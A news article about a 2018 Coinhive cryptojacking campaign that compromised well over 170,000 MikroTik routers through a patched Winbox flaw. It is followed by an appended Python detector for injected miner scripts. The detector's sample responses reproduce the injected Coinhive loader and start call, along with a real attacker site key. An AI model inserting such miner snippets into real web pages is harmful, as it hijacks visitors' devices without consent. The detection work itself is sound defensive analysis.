Massive Coinhive cryptojacking campaign infects 170,000 MikroTik routers.
What is MikroTik?
According to its official website, MikroTik is a Latvian company founded in 1996 to develop routers and ISP systems. MikroTik now provides hardware and software for Internet connectivity in most countries around the world. RouterOS is the operating system that runs on most MikroTik devices.
Recently, security researchers uncovered a massive cryptojacking campaign that infects MikroTik routers with a copy of the Coinhive in-browser cryptocurrency mining script.
The campaign appears to have started this week and, in its first stages, was mainly active in Brazil. Later on, it expanded to MikroTik routers all over the world.
The first to spot the attacks was a Brazilian researcher who goes by the name MalwareHunterBR on Twitter. As the campaign grew, infecting more and more routers, it also caught the attention of Simon Kenin, a security researcher with Trustwave's SpiderLabs division.
— MalwareHunterBR (@MalwareHunterBR) July 30, 2018
In a report, Trustwave's Kenin says that the hacker (or hackers) behind this campaign appear to have compromised around 72,000 MikroTik routers in Brazil during the first stage of the attack.
Kenin says the attacker uses a zero-day in the Winbox component of MikroTik routers that was discovered in April. MikroTik patched the flaw in less than a day, back in April, but a vendor patch does not mean that router owners actually applied it.
Instead, the former zero-day was dissected by security researchers, and public proof-of-concept (PoC) code appeared in several places on GitHub.
Use of the April 2018 MikroTik zero-day
According to Kenin, the attacker used one of those PoCs to alter traffic passing through the MikroTik router, injecting a copy of the Coinhive library into all pages served through the router.
We know it’s only one threat actor exploiting this flaw because the attacker used only one Coinhive key for all the Coinhive injections he performed during the past week.
Furthermore, Kenin says he also identified cases where non-MikroTik users were affected. This happened because some Brazilian ISPs were using MikroTik routers for their main network, so the attacker managed to inject the malicious Coinhive code into a massive amount of web traffic.
In addition, Kenin says that because of the way the attack was performed, the injection worked in both directions, not only for traffic going to the user. For example, if a website was hosted on a local network behind an affected MikroTik router, traffic to that website would also have the Coinhive library injected into it.
Hacker became more careful, shrunk operation
But injecting Coinhive into so much traffic is very noisy and tends to annoy users, which could lead users and ISPs to investigate the source of the problem.
The attacker also appears to have understood this. Kenin says that in recent attacks the hacker switched tactics and only injected the Coinhive script into error pages returned by the routers.
But shrinking the attack surface doesn't look like a downgrade for the attacker. The Trustwave researcher says the attack is spreading outside Brazil and has now doubled the initial numbers, having infected over 170,000 MikroTik routers.
“Let me emphasize how bad this attack is,” Kenin says. “There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens, if not hundreds of users daily.”
“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source; carrier-grade router devices,” he added.
“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”
Security researcher Troy Mursch said he discovered a second Coinhive key being injected into the traffic of MikroTik routers. This campaign has touched over 25,000 routers, bringing the total to over 200,000, as the first Coinhive key was by then in use on over 175,000 devices. It is unclear whether this second campaign is being orchestrated by another hacker or by the same threat actor, who may have switched to a new key after Trustwave exposed the first operation.
Coinhive site key "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4" is used in another #cryptojacking campaign targeting MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
— Bad Packets Report (@bad_packets) August 2, 2018
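The injection described above, and the reasoning that one shared Coinhive site key ties many infected routers to one campaign while a new key marks a second one, can be checked from captured HTTP responses. The following is an added example, not code from the article or from Trustwave; it assumes Coinhive's public embed shape (a loader script from coinhive.com followed by a `CoinHive.Anonymous(key).start()` call), uses the site key quoted in the article plus a constructed placeholder key, and runs on constructed response samples.

```python
import re
# Coinhive's public embed shape (an assumption about the injected markup, not taken
# from Trustwave's report): loader <script> from coinhive.com, then CoinHive.Anonymous(key).start().
LOADER_RE = re.compile(
    r'<script[^>]*\bsrc=["\']https?://(?:[\w.-]+\.)?coinhive\.com/lib/coinhive\.min\.js["\']',
    re.IGNORECASE)
KEY_RE = re.compile(r'CoinHive\.Anonymous\(\s*["\']([A-Za-z0-9]{16,64})["\']')

KEY_ON_PAGE = "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4"  # key quoted in the article
KEY_SECOND = "EXAMPLEKEY" + "0" * 22               # constructed placeholder key

# Constructed (status, body) pairs standing in for responses captured behind a
# router: a clean page, an injected content page and two injected error pages.
SAMPLES = [
    (200, "<html><body><h1>Welcome</h1></body></html>"),
    (200, '<html><body><p>Shop</p>'
          '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
          f'<script>var m = new CoinHive.Anonymous("{KEY_ON_PAGE}"); m.start();</script>'
          '</body></html>'),
    (404, '<html><body>Error 404: Not Found'
          '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
          f'<script>new CoinHive.Anonymous("{KEY_ON_PAGE}").start();</script>'
          '</body></html>'),
    (502, "<html><body>Error 502: Bad Gateway"
          "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
          f"<script>new CoinHive.Anonymous('{KEY_SECOND}').start();</script>"
          "</body></html>"),
]

def find_site_key(body):
    """Return the Coinhive site key if the body carries an injected miner, else None.
    Requiring the loader tag too avoids flagging pages that merely mention the API."""
    if not LOADER_RE.search(body):
        return None
    match = KEY_RE.search(body)
    return match.group(1) if match else None

def campaign_summary(responses):
    """Tally injections per site key, split into content pages and 4xx/5xx error
    pages. One key across many hosts is what tied the injections to one actor;
    a different key, as Bad Packets found, marks a second campaign."""
    summary = {}
    for status, body in responses:
        key = find_site_key(body)
        if key is None:
            continue
        bucket = "error_pages" if status >= 400 else "content_pages"
        summary.setdefault(key, {"content_pages": 0, "error_pages": 0})[bucket] += 1
    return summary
```

Run over real captures, a key whose hits sit almost entirely in the error_pages bucket matches the later, quieter phase of the campaign described above.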